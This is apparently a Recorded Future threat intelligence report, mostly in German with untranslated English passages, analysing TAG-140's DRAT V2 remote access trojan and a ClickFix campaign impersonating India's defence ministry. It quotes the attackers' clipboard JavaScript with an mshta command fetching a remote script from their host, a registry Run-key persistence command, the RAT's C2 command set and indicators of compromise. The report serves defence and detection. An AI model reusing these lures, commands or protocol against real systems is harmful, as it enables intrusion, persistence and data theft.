DRAT V2: Aktualisiertes DRAT erscheint im Arsenal von TAG-140

DRAT V2: Aktualisiertes DRAT erscheint im Arsenal von TAG-140

Insikt Group Logo

Executive Summary

Während einer Untersuchung einer jüngsten TAG-140-Kampagne, die auf indische Regierungsorganisationen abzielte, identifizierte die Insikt Group eine modifizierte Variante des DRAT-Fernzugriffstrojaners (RAT), die wir als DRAT V2 bezeichneten. TAG-140 weist Überschneidungen mit SideCopy auf, einer operativen Untergruppe, die als Untercluster oder operativer Partner von Transparent Tribe (auch als APT36, ProjectM oder MYTHIC LEOPARD verfolgt wird) eingestuft wird. TAG-140 hat in seinem Malware-Arsenal und seinen Verbreitungstechniken kontinuierlich iterative Weiterentwicklungen und Vielfalt bewiesen. Diese jüngste Kampagne, die das indische Verteidigungsministerium über ein geklontes Pressemitteilungsportal nachahmte, markiert eine leichte, aber bemerkenswerte Veränderung sowohl in der Malware-Architektur als auch in der Command-and-Control-Funktionalität (C2).

Die Bereitstellung von DRAT V2 spiegelt die Weiterentwicklung der Remote-Access-Tools von TAG-140 wider, indem von einer .NET-basierten Version von DRAT zu einer neuen, in Delphi kompilierten Variante übergegangen wird. Beide Versionen gehören zu den zahlreichen RATs, die die Gruppe eingesetzt hat, wie z. B. CurlBack, SparkRAT, AresRAT, Xeno RAT, AllaKore und ReverseRAT, was auf ein Muster der rotierenden Malware-Nutzung hinweist. DRAT V2 aktualisiert sein benutzerdefiniertes, TCP-basiertes, serverinitiiertes C2-Protokoll und erweitert die funktionalen Fähigkeiten, einschließlich der Ausführung beliebiger Shell-Befehle und einer verbesserten Interaktion mit dem Dateisystem.

Analysis of the infection chain indicates that initial access was achieved through a ClickFix-style social engineering lure. Victims were enticed to execute a malicious script via mshta.exe, which led to the execution of the BroaderAspect .NET loader, which has previously been used by TAG-140. BroaderAspect establishes persistence and subsequent DRAT V2 installation and execution.

Die Insikt Group schreibt diese Aktivität basierend auf Überschneidungen in der Domain, der Abstammung der Malware und den Eigenschaften mit ziemlicher Sicherheit der Infrastruktur TAG-140 zu. Die Verbesserungen von DRAT V2 deuten auf eine wahrscheinliche Erhöhung der Kapazität von TAG-140 für maßgeschneiderte Post-Exploitation und laterale Bewegungen in Opfernetzwerken hin. Daher ist sein Auftreten ein relevanter Indikator für die fortschreitende Entwicklung der Fähigkeiten des Bedrohungsakteurs und dessen strategische Zielsetzung auf Indiens Verteidigungs- und Regierungseinrichtungen.

Wichtige Erkenntnisse

Hintergrund

TAG-140 ist eine Gruppe von Bedrohungsakteuren, die sich mit der öffentlich gemeldeten Gruppe Sidecopy überschneidet, einer mutmaßlich mit dem pakistanischen Staat verbundenen Advanced Persistent Threat (APT)-Gruppe, die als Untergruppe bzw. operativer Partner von Transparent Tribe (auch als APT36, ProjectM oder MYTHIC Leopard bekannt) gilt. Seit mindestens 2019 ist TAG-140 aktiv und zielt hauptsächlich auf indische Einrichtungen ab. Die jüngsten Aktivitäten haben sich über die traditionellen Bereiche Regierung, Verteidigung, Schifffahrt und Wissenschaft hinaus erweitert und umfassen nun auch Organisationen, die mit den Eisenbahn-, Öl- und Gasministerien sowie dem Außenministerium des Landes verbunden sind.

Die Gruppe hat gezeigt (1, 2, 3), dass sich ihre Vorgehensweise ständig weiterentwickelt: Sie nutzt Spearphishing-Kampagnen, verwendet HTML-Anwendungen (HTAs) oder Microsoft Installer (MSI)-Pakete zur Verbreitung, nutzt Software-Schwachstellen aus (z. B. WinRAR) und verwendet viele verschiedene RATs wie CurlBack, SparkRAT, AresRAT, Xeno RAT, AllaKore, ReverseRAT und DRAT. Ihre Infektionsketten zielen in der Regel sowohl auf Windows- als auch auf Linux-Umgebungen ab.

Insikt Group analysierte Artefakte aus einer kürzlich durchgeführten ClickFix-Kampagne, die das indische Ministerium nachahmte und die wir den TAG-140-Bedrohungsakteuren zugeschrieben haben. TAG-140 erstellte eine gefälschte Website, die das offizielle Pressemitteilungsportal des indischen Verteidigungsministeriums nachahmt, indem sie die bösartige Domain email[.]gov[.]in[.]drdosurvey[.]info verwendeten, die der legitimen Regierungswebsite mod[.]gov[.]in stark ähnelt. (urlscan.io). Die geklonte Website replizierte die Struktur und das Layout des authentischen Portals und listete Pressemitteilungen von September 2023 bis April 2025 auf. Allerdings war nur der Link für März 2025 aktiv.

image1.png
Abbildung 1: Geklontes Portal des Verteidigungsministeriums (Quelle: Hunt.io)

Das Klicken auf den aktiven Link vom März 2025 löste einen Social-Engineering-Angriff im ClickFix-Stil aus. Die Insikt Group führte eine zusätzliche Analyse der TAG-140 Windows-Infektionskette durch und stellte fest, dass sie einer Infektionskette ähnelt, die von Seqrite Labs in ihrer Forschung zur TAG-140-Aktivität gemeldet wurde und die Ende 2024 identifiziert wurde. Unsere Analyse der Infektionskette (Abbildung 2) zeigt, dass die endgültige Nutzlast eine neue, auf Delphi basierende Variante von DRAT ist (als DRAT V2 bezeichnet). Zuvor wurde DRAT in .NET entwickelt und erstmals im Jahr 2023 der SideCopy-Aktivität zugeschrieben. Die aktualisierte Variante umfasst neue Befehlsfunktionen und ein leicht modifiziertes C2-Protokoll.

image5.png
Figur 2: TAG-140-Infektionskette, die DRAT V2 ablegt (Quelle: Recorded Future)

1. The user is directed to the URL below (urlscan.io). While we do not know the delivery mechanism used, based on TAG-140’s tactics, techniques, and procedures (TTPs), this is likely delivered as a spearphishing email enticing the user to click on the link. The user is then lured to click on the “March 2025 Release” link. From a Windows machine, clicking on that link redirects the user to the uniform resource identifier (URI) /captcha/windows.php.

hxxps://email[.]gov[.]in[.]drdosurvey[.]info/content/press-releases-ministry-defence-0.html

2. The redirected website (urlscan.io) displays the warning “**Disclosure - For Official Use Only (FOUO)**” and asks the user to click “continue.”

3. Clicking “continue” runs JavaScript that copies the malicious command below to the clipboard and directs the user to paste and execute it in a command shell. The command uses mshta.exe to fetch and run a remote script (index.php/sysinte.hta) from TAG-140’s infrastructure, _trade4wealth[.]in_.

const calcPath = "C:\\Windows\\System32\\mshta.exe
hxxps://trade4wealth[.]in/admin/assets/css/default/index.php";
navigator.clipboard.writeText(calcPath)

4. Execution of index.php/sysinte.hta creates and executes the BroaderAspect loader, first reported on by Seqrite Labs. BroaderAspect performs the following actions:

a. Lädt das Köderdokument survey.pdf von der folgenden URL herunter und öffnet es:

hxxps://trade4wealth[.]in/admin/assets/css/Vertical-layout-design/01/survey.pdf

b. Creates and executes a Windows batch file named noway.bat, which contains a command that establishes persistence for DRAT v2 by adding a registry entry to a Microsoft-defined autostart location

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Edgre" /t REG_SZ /F /D "cmd /C start C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf

c. Lädt die DRAT V2-Nutzlast von den folgenden URLs herunter und dekomprimiert sie:

Initial Request: hxxps://trade4wealth[.]in/admin/assets/css/Vertical-layout-design/02
Redirect: hxxps://trade4wealth[.]in/admin/assets/css/Vertical-layout-design/02/ayty.ert

d. Führt DRAT V2 mit dem folgenden Befehl aus:

C:\Windows\system32\cmd.exe /c cmd /C start
C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf

Die Insikt Group ordnet diese Aktivität TAG-140 mit mäßigem Vertrauen zu, basierend auf den folgenden Aspekten:

  1. Die Nachahmung und das Anvisieren indischer Verteidigungsorganisationen, wie das indische Verteidigungsministerium, stimmt mit bekannten TAG-140-Zielen überein.
  2. Die Verwendung des BroaderAspect-Loaders und von DRAT (beide Varianten), die beide anscheinend ausschließlich von TAG-140 verwendet werden (1, 2), steht im Einklang mit den TTPs von TAG-140.
  3. Die Domäne email[.]gov[.]in[.]drdosurvey[.]info überschneidet sich mit anderen APT36-Angriffen (1, 2) und verwendet Namecheap als seinen Hosting-Anbieter. Wir haben in mehreren Fällen beobachtet, dass TAG-140 häufig Namecheap, GoDaddy und Hostinger verwendet (1, 2, 3, 4).
  4. Zusätzlich zu DRAT V2 hat TAG-140 zuvor Delphi-basierte Malware verwendet, wie zum Beispiel die Open-Source-Software AllaKore RAT.

Technische Analyse

DRAT V2 ist ein leichtgewichtiger RAT, der in Delphi entwickelt wurde und eine Weiterentwicklung der früheren .NET-basierten Variante darstellt, die erstmals TAG-140 im Jahr 2023 zugeschrieben wurde. DRAT V2 führt mehrere Aktualisierungen gegenüber seinem Vorgänger ein, darunter:

Eine Übersicht auf hoher Ebene über DRAT V2 wird in Abbildung 3 bereitgestellt.

image10.png
Figur 3: DRAT V2-Zusammenfassung (Quelle: Recorded Future)

DRAT V2 unterstützt eine Reihe von Befehlen, die es TAG-140-Operatoren ermöglichen, eine breite Palette von Interaktionen mit kompromittierten Hosts durchzuführen. Nach dem Aufbau der Kommunikation wartet die Malware passiv auf Anweisungen vom Command-and-Control-Server (C2). Zu den unterstützten Operationen gehören die Systemaufklärung, wie das Sammeln des Benutzernamens, der Betriebssystemversion, der Systemzeit und des aktuellen Arbeitsverzeichnisses, sowie die Validierung der Konnektivität und die Aufzählung lokaler Dateisysteme und Verzeichnisse.

Über die Aufklärung hinaus ermöglicht DRAT V2 eine aktivere Interaktion mit der Zielumgebung. Es ermöglicht Dateiübertragungen in beide Richtungen zwischen dem Host und der C2-Infrastruktur, sodass die Betreiber zusätzliche Nutzlasten hochladen oder Daten exfiltrieren können. Zusätzlich unterstützt es die Ausführung lokaler Dateien und beliebiger Windows-Shell-Befehle und gibt die Ausgabe an das C2 zurück. Diese Funktionen bieten TAG-140 eine dauerhafte und flexible Kontrolle über das infizierte System und ermöglichen sowohl automatisierte als auch interaktive Aktivitäten nach der Ausnutzung, ohne dass zusätzliche Malware-Tools bereitgestellt werden müssen. Abbildung 4 bietet eine Zusammenfassung der Fähigkeiten von DRAT V2.

image7.png
Figur 4: DRAT V2 capability matrix (Source: Recorded Future)

DRAT V2 Befehle

DRAT V2 verwendet weiterhin eine Befehlsschnittstelle, die ein benutzerdefiniertes, textbasiertes TCP-Protokoll ist, das vom Server initiiert wird, um Fernsteuerungsfunktionen über einen kompromittierten Host zu unterstützen. Die Ausführung von Befehlen, die Manipulation von Dateien und die Aufklärung des Systems werden durch ein strukturiertes Format ermöglicht.

Das DRAT V2-Befehlsprotokoll zeichnet sich durch die Verwendung von Tilde (~) und Pipe (|) als Trennzeichen aus. Sobald die Verbindung mit ihrer C2-Infrastruktur hergestellt ist, wechselt die Malware in einen passiven Zustand und wartet auf eingehende Anweisungen vom Server. Diese Anweisungen umfassen neun verschiedene Befehlstypen (Tabelle 1), die Fähigkeiten wie Host-Erkennung, Dateiverwaltung und direkte Ausführung beinhalten. Jeder Befehl folgt einem deterministischen Format, das es dem Operator ermöglicht, Aktionen nach der Kompromittierung konsistent und mit geringem Aufwand zu orchestrieren.

DRAT V2-Befehl
Fähigkeit
Beschreibung
initial_infotonas
Systeminformationen
Dieser Befehl startet eine Erkundung auf Systemebene, indem er Details zur Hostumgebung anfordert, einschließlich Benutzername, Betriebssystemversion, Zeitstempel und Arbeitsverzeichnis. Die Antwort ist in sieben Feldern gegliedert.
sup
Echo/Verbindungstest
Dieser Befehl wird verwendet, um die aktive Kommunikation mit dem kompromittierten Host zu überprüfen.
lst_of_sys_drvs
Volumes auflisten
Dieser Befehl ermöglicht es DRAT V2, zugängliche logische Laufwerke auf dem Zielrechner aufzulisten.
here_are_dir_details
Verzeichnisse und Dateien mit Informationen auflisten
Dieser Befehl ruft strukturierte Metadaten für Verzeichnisse und Dateien ab, einschließlich Name, Größe, Zeitstempel und Pfad. Bemerkenswerterweise enthält die Implementierung einen Fehler, bei dem der vollständige Pfad nicht korrekt mit nachfolgenden Einträgen verknüpft wird, was möglicherweise die Operatoranalyse beeinträchtigt.
filina_for_down
Dateigröße
Dieser Befehl wird verwendet, um die Byte-Größe einer angegebenen Datei abzurufen.
file_upl
Datei-Upload
Dieser Befehl unterstützt die Übertragung von Dateien vom C2 auf den Zielhost. Der Befehl erfordert die Angabe sowohl des Dateipfads als auch der Dateigröße, um die Bereitstellung der Nutzlast zu erleichtern oder sekundäre Tools zu implementieren.
this_filina_exec
Dateiausführung
Dieser Befehl führt eine angegebene Datei auf dem Hostsystem aus. Diese Fähigkeit ermöglicht die Bereitstellung zusätzlicher Nutzlasten oder die Ausführung vorhandener Binärdateien im lokalen Dateisystem.
fil_down_confirmina
Dateidownload
Dieser Befehl ermöglicht die Exfiltration von Dateien vom Opfersystem zum C2-Server. Im Gegensatz zu anderen Antworten gibt es keinen Antwort-Header, und nur der rohe Dateiinhalt wird an das C2 gesendet.
exec_this_comm
Befehlsausführung
Dieser Befehl erlaubt die Ausführung beliebiger Shell-Befehle auf dem infizierten Host. Dies bietet erhebliche Flexibilität für interaktive Operationen und ermöglicht Echtzeit-Aufgaben sowie bedarfsgesteuerte Post-Exploitation-Aktivitäten.

Tabelle 1: DRAT V2 commands (Source: Recorded Future)

Dieser Befehlssatz ermöglicht es TAG-140, eine Reihe von Post-Exploitation-Zielen zu unterstützen, einschließlich Host-Aufklärung, Daten-Staging und potenzieller lateraler Bewegungen. Insbesondere erweitert DRAT V2 die Funktionalität seines Vorgängers durch die Integration der Unterstützung für die Ausführung beliebiger Befehle. Anhang B enthält detaillierte Aufschlüsselungen der einzelnen Befehle, einschließlich der Parameter.

Figure 5 shows an example of the C2 communication between an infected host and the C2. In this example, the C2 server sends the command exec_this_comm~whoami, which tells the infected host to execute the command whoami. The infected host then responds with the output of the command.

image11.png
Abbildung 5: DRAT V2-Befehlsausführungsanforderungs- und Antwortpakete, aufgezeichnet und angezeigt von Wireshark (Quelle: Recorded Future)

DRAT vs DRAT V2

Diese vergleichende Analyse hebt die technischen und betrieblichen Unterschiede zwischen dem ursprünglichen DRAT und DRAT V2 hervor. Der Wechsel der Entwicklungsplattformen markiert einen bedeutenden architektonischen Übergang, der beeinflusst, wie die Malware kompiliert, ausgeführt und möglicherweise entdeckt wird. Obwohl beide Varianten ähnliche Kernfunktionen wie leichte RATs beibehalten, führt DRAT V2 bedeutende Verbesserungen in seiner Befehlsstruktur, den C2-Verschleierungstechniken und dem Kommunikationsprotokoll ein, während es gleichzeitig die Verwendung der String-Verschleierung minimiert. Diese Anpassungen spiegeln wahrscheinlich die kontinuierlichen Bemühungen von TAG-140 wider, ihre Tools weiterzuentwickeln, um eine bessere Umgehung, Modularität und Flexibilität bei Post-Exploitation-Operationen zu erreichen.

Befehlsheader-Variation

While both DRAT variants implement similar commands for remote administration, each version uses distinct naming conventions for command headers. For instance, DRAT’s system information command is labeled getInformitica, whereas DRAT V2 uses initial_infotonas. DRAT V2 also introduced a new command, exec_this_comm, which enables arbitrary shell command execution on the infected host, an enhancement not present in the original DRAT and indicative of expanded post-exploitation capabilities. The below comparison table (Table 2) presents a detailed, line-by-line breakdown of request and response headers across both versions. In that table, command mappings highlighted in green denote commands that are functionally retained across both variants, while items highlighted in yellow represent new additions exclusive to DRAT V2.

Befehl
DRAT-Befehlsheader
DRAT V2-Befehlsheader
Anfrage nach von Systeminformationen
getInformitica
initial_infotonas
Antwort auf Anfrage nach Systeminformationen
informiticaBack|
my_ini_info|
Echo/Verbindungstest-Anforderung
sup
sup
Echo/Connectivity-Test-Antwort
supconfirm
hello_frm_me
Anfrage nach Listenvolumen auflisten
drivesList
lst_of_sys_drvs
Antwort auf Anfrage nach Listenvolumen
drivesList
lst_of_sys_drvs
List directories and files with info
Request
Pfad eingeben
here_are_dir_details
List directories and files with info
Response
Pfad eingeben
here_are_dir_details
Anfrage zur Dateigröße
fdl
filina_for_down
Antwort auf Anfrage nach Dateigröße
fInfo
fileina_detailwa
Anfrage nach Dateiupload
fup
file_upl
Antwort auf Anfrage nach Dateiupload
fupConfirm
file_upl_confrm
Anfrage nach Dateiausführung
fupexec
this_filina_exec
Antwort auf Anfrage nach Dateiausführung
fupexecConfirm
fileExecuted
file_exec_confirm
Anfrage zum Herunterladen von Dateien
fdlConfirm
fil_down_confirmina
Anfrage zur Befehlsausführung
exec_this_comm
Antwort zur Anfrage zur Befehlsausführung
comm_resultwa
Antwort auf Anfrage zum Dateidownload
[Dateiinhalt]
[Dateiinhalt]

Tabelle 2: Befehlsvergleich zwischen DRAT und DRAT V2 (Quelle: Recorded Future)

Textformat in C2-Kommunikation

Beide Versionen nutzen textbasierte Kommunikationsprotokolle für Command-and-Control-Interaktionen (C2). Allerdings unterscheiden sie sich in den Codierungsanforderungen: DRAT V2 akzeptiert Befehle sowohl in Unicode als auch in ASCII, antwortet jedoch immer in ASCII, während das ursprüngliche DRAT Unicode sowohl für die Eingabe als auch für die Ausgabe vorschreibt (Abbildung 6).

image8.png
Abbildung 6: DRAT V1 list volumes request and response recorded and displayed by Wireshark (Source: Recorded Future)

Unterschiede in Systeminformationen

The system information response of both versions includes many similarities, but several differences include the text in Unicode, different command request headers, and WinDefender instead of win-def, both of which are hard-coded. Finally, the format of the Windows version in the system information response varies between DRAT and DRATV2. DRAT simply returns the value from the registry key, Software\Microsoft\Windows NT\CurrentVersion\ProductName, while DRAT V2 gets the Windows version using the API call GetVersionExW() and returns a custom string that is Base64-encoded in the source code. Table 3 outlines the differences between the two commands.

Systeminformationskomponenten
Antwort auf DRAT-Systeminformationen
DRAT V2-Systeminformationsantwort
Befehls-Trennzeichen
Daten nach dem Zeichen ~ aus der eingehenden Anfrage
Daten nach dem Zeichen ~ aus der eingehenden Anfrage
N.A Field
Hardcodiertes „N.A“
Hardcodiertes „N.A“
Feld „Benutzername“
Username retrieved via SystemInformation.Username()
Username retrieved via System:​:​Sysutils:​:​ GetEnvironmentVariable("USERNAME")
Feld „Windows-Version“
The Windows version retrieved by: Software\Microsoft\Windows NT\CurrentVersion\ProductName

Example: Windows 10 Pro

Die von GetVersionExW() abgerufene Windows-Version wird in eine der folgenden übersetzt:

  • V2luZG93cyAxMSBPUw==
    • Windows 11 OS
  • V2luZG93cyAxMCBPUw==
    • Windows 10 OS
  • V2luZG93cyA4IG9yIDEw
    • Windows 8 oder 10
  • V2luZG93cyA3IE9T
    • Windows 7 OS
  • VW5rbm93biBXaW5kb3dzIFZlcnNpb24=
    • Unbekannte Windows-Version
Identifikatorfeld
Hard-coded Win Defender
Hard-coded win-def
Datums-/Zeitstempelfeld
Current date and time in DD/MM/YYYY HH:​MM:​SS AM/PM format, retrieved via DateTime.Now.ToString()
Aktuelles Datum und Uhrzeit im Format JJJJ-MM-TT HH:​MM:​SS, abgerufen über SysUtils::Now()
Arbeitsverzeichnispfad-Feld
Vollständiger Pfad des Arbeitsverzeichnisses
Vollständiger Pfad des Arbeitsverzeichnisses

Tisch 3: DRAT vs DRAT V2 system information request and response fields (Source: Recorded Future)

Unterschiede in der C2-Obfuskation

In beiden DRAT-Varianten sind die C2-Informationen Base64-codiert. DRAT codiert die C2-IP-Adresse direkt, während DRAT V2 seinen Ansatz zur C2-Verschleierung ändert, indem er der IP-Adresse vor der Base64-Codierung eine der folgenden Zeichenfolgen voranstellt:

Beispiel für eine codierte C2-IP mit Präfix: PD48Pjw+PD48Pjw+PD48Pjw+PD48PjE4NS4xMTcuOTAuMjEy
Beispiel für eine dekodierte C2-IP mit Präfix: <><><><><><><><><><><>185.117.90.212

Diese vorangestellten Muster dienen wahrscheinlich als rudimentäre Integritätsprüfungen oder helfen, eine triviale Dekodierung durch Analysten und automatisierte Werkzeuge zu verhindern.

String-Verschleierung

Strategien zur Zeichenkettenobfuskierung unterscheiden sich ebenfalls zwischen den Varianten. DRAT verwendet ein umfangreicheres Schema, das einen Substitutionsalgorithmus nutzt, um sowohl Befehle als auch Betriebszeichenfolgen zu kodieren. DRAT V2 hingegen verschleiert selektiv Zeichenfolgen, wie die Windows-Version und C2-Informationen, belässt jedoch die Befehlsheader im Klartext. Dieser begrenzte Verschleierungsansatz in DRAT V2 könnte einen Kompromiss zwischen Tarnung und Zuverlässigkeit der Analyse darstellen.

Erkennungen

image6.png Erkennungen
Schnauben image3.png
  • Erkennen Sie ausgehende C2-Kommunikation von DRAT-Malware: Verwenden Sie diese Snort-Regeln, um ausgehende DRAT- und DRAT V2 C2-Kommunikation zu identifizieren.
Sigma image4.png
  • Erkennung der TAG-140-Persistenz über den Run-Schlüssel: Verwenden Sie diese Sigma-Regel, um TAG-140-Angriffe zu identifizieren, die Persistenz durch das Erstellen eines Registrierungsschlüssels über eine Batchdatei herstellen, wenn der Batchdatei die abschließenden Anführungszeichen im Befehl fehlen.
YARA image12.png
  • Erkennen des BroaderAspect Loader, der von TAG-140 verwendet wird: Verwenden Sie diese YARA-Regel, um Dateien zu erkennen, die Zeichenfolgen enthalten, die mit der BroaderAspect-Malware verknüpft sind, einschließlich .pdf und .bat-Dateien. Dateierweiterungen und spezifische Malware-Kennungen.
  • Erkennen Sie DotNet- und Delphi-Varianten der DRAT-Malware, die von TAG-140 verwendet wird: Verwenden Sie diese YARA-Regeln, um DRAT und DRAT V2 zu erkennen

Gegenmaßnahmen

Ausblick

Die Bereitstellung von DRAT V2 durch TAG-140 entspricht der langjährigen Praxis der Gruppe, eine breite und austauschbare Suite von Remote-Access-Trojanern zu pflegen. Diese fortgesetzte Diversifizierung erschwert die Zuordnung, Erkennung und Überwachung von Aktivitäten. DRAT V2 scheint eher eine weitere modulare Ergänzung als eine endgültige Weiterentwicklung zu sein, was die Wahrscheinlichkeit erhöht, dass TAG-140 weiterhin RATs über Kampagnen hinweg rotieren wird, um Signaturen zu verschleiern und die operative Flexibilität zu bewahren.

Trotz dieser Herausforderungen zeigt die DRAT V2-Infektionskette einen begrenzten Einsatz von Techniken zur defensiven Umgehung oder Anti-Analyse. Das Fehlen von Code-Verschleierung, Sandbox-Umgehung oder komplexem Loader-Verhalten erhöht die Wahrscheinlichkeit einer frühzeitigen Erkennung durch grundlegende Telemetrie und statische Analyse. Sicherheitsteams sollten damit rechnen, dass weiterhin mit Malware-Tools und Infektionsketten experimentiert wird. Die Überwachung der Spearphishing-Infrastruktur, der Wiederverwendung von Loadern und von Verhaltensindikatoren wird entscheidend sein, um die Sichtbarkeit der TAG-140-Aktivitäten aufrechtzuerhalten.

Anhang A: Indikatoren für Kompromittierungen

DRAT V2

ce98542131598b7af5d8aa546efe8c33a9762fb70bff4574227ecaed7fff8802
0d68012308ea41c6327eeb73eea33f4fb657c4ee051e0d40a3ef9fc8992ed316
c73d278f7c30f8394aeb2ecbf8f646f10dcff1c617e1583c127e70c871e6f8b7

DRAT

830cd96aba6c328b1421bf64caa2b64f9e24d72c7118ff99d7ccac296e1bf13d
c328cec5d6062f200998b7680fab4ac311eafaf805ca43c487cda43498479e60

DRAT V2 C2

185[.]117[.]90[.]212:7771
154[.]38[.]175[.]83:3232
178[.]18[.]248[.]36:6372

DRAT C2

38[.]242[.]149[.]89:61101

Anhang B: DRAT V2-Befehlsparameter und -Antworten

Systeminformationen

The initial_infotonas command initiates system-level reconnaissance by requesting host environment details, including username, OS version, timestamp, and working directory. The response is structured across seven fields.

Systeminformationsanforderungs-Header
Parameter
Parameterbeschreibung
initial_infotonas
1
Unbekannt: Es wurden fortlaufende Nummern festgestellt.
Antwortheader für Systeminformationen
Parameter
Parameterbeschreibung
my_ini_info|
7
1: Daten nach dem Zeichen ~ aus der eingehenden Anfrage
2: Fest codierte Zeichenfolge „N.A“
3: Benutzername abgerufen über System:​:​Sysutils:​:​GetEnvironmentVariable("USERNAME")

4: Windows version retrieved by GetVersionExW(), translated into one of the following, which is Base64-encoded in the source code:

  • Windows 11 OS
  • Windows 10 OS
  • Windows 8 oder 10
  • Windows 7 OS
  • Unbekannte Windows-Version
5: Hard-coded string win-def
6: Aktuelles Datum und Uhrzeit im Format JJJJ-MM-TT HH:​MM:​SS, abgerufen über System:​:​Sysutils:​:​Now()
7: Vollständiger Pfad des Arbeitsverzeichnisses

Echo/Verbindungstest

The sup command is used to verify active communication with the compromised host.

Echo/Connectivity Test Request Header
Parameter
Parameterbeschreibung
sup
0
Befehlsausführung Response Header
Parameter
Parameterbeschreibung
hello_frm_me
0

Volumes auflisten

The lst_of_sys_drvs command allows DRAT V2 to enumerate accessible logical drives on the target machine.

Request Header für Volumenlisten
Parameter
Parameterbeschreibung
lst_of_sys_drvs
0
Response Header für Volumenlisten
Parameter
Parameterbeschreibung
lst_of_sys_drvs
1
List of volumes in the following format:
[volume letter
1]:\1000000\r\n[volume letter
2]1000000\r\n[volume letter
n]1000000\r\

Verzeichnisse mit Attributen auflisten

The here_are_dir_details command retrieves structured metadata for directories and files, including name, size, timestamp, and path. Notably, the implementation contains a flaw where the full path concatenates improperly with subsequent entries, potentially impacting operator parsing.

Request Header „Verzeichnisse auflisten“
Parameter
Parameterbeschreibung
here_are_dir_details
1
Verzeichnispfad
Response Header „Verzeichnisse auflisten“
Parameter
Parameterbeschreibung
here_are_dir_details
1

Liste der Unterverzeichnisse und Dateien mit Attributen im folgenden Format, getrennt durch "+":

  • Verzeichnis oder Dateiname
  • Dateigröße in Bytes oder „N/A“ für Verzeichnisse
  • Timestamp of file using Sysutils::FileAge or the default 1899-12-29 00:00:00 for directories
  • Vollständiger Pfad

Dateigröße

The filina_for_down command is used to retrieve the byte size of a specified file.

Request Header für Dateigrößen
Parameter
Parameterbeschreibung
filina_for_down
1
Dateipfad
Response Header für Dateigröße
Parameter
Parameterbeschreibung
fileina_detailwa
1
Dateigröße in Byte

Datei-Upload

The file_upl~ command supports the transfer of files from the C2 to the target host. The command requires specification of both the file path and size, facilitating payload staging or deployment of secondary tools.

Kopfzeile der Dateiupload-Anfrage
Parameter
Parameterbeschreibung
fil_upl~
2
Dateipfad und Dateigröße
Response Header für den Dateiupload
Parameter
Parameterbeschreibung
fil_upl_confrm
0

Dateiausführung

The this_filina_exec command executes a specified file on the host system. This capability enables the delivery of additional payloads or the execution of existing binaries within the local file system.

Request Header für Dateiausführung
Parameter
Parameterbeschreibung
this_filina_exec
1
Vollständiger Pfad der Datei, die ausgeführt werden soll
Antwort auf Anfrage für Dateiausführung
file_exec_confirm

Dateidownload

The fil_down_confirmina command enables exfiltration of files from the victim system to the C2 server. Unlike other responses, there is no response header, and only the raw file contents are sent to the C2.

Kopfzeile der Datei-Download-Anfrage
Parameter
Parameterbeschreibung
fil_down_confirmina
1
Vollständiger Pfad der Datei zum Herunterladen
Antwortheader für Dateidownload
Parameter
Parameterbeschreibung
Hat keinen Header
0
Inhalt der Rohdatei

Befehlsausführung

The exec_this_comm command permits arbitrary shell command execution on the infected host. This adds significant flexibility for interactive operations, enabling real-time tasking and on-demand post-exploitation activity.

Befehlsausführungsanforderungs-Header
Parameter
Parameterbeschreibung
exec_this_comm
1
Windows-Befehl
Befehlsausführung Response Header
Parameter
Parameterbeschreibung
comm_resultwa
1
Angeforderte Windows-Befehlsantwort

Um die gesamte Analyse zu lesen, klicken Sie hier, um den Bericht als PDF herunterzuladen.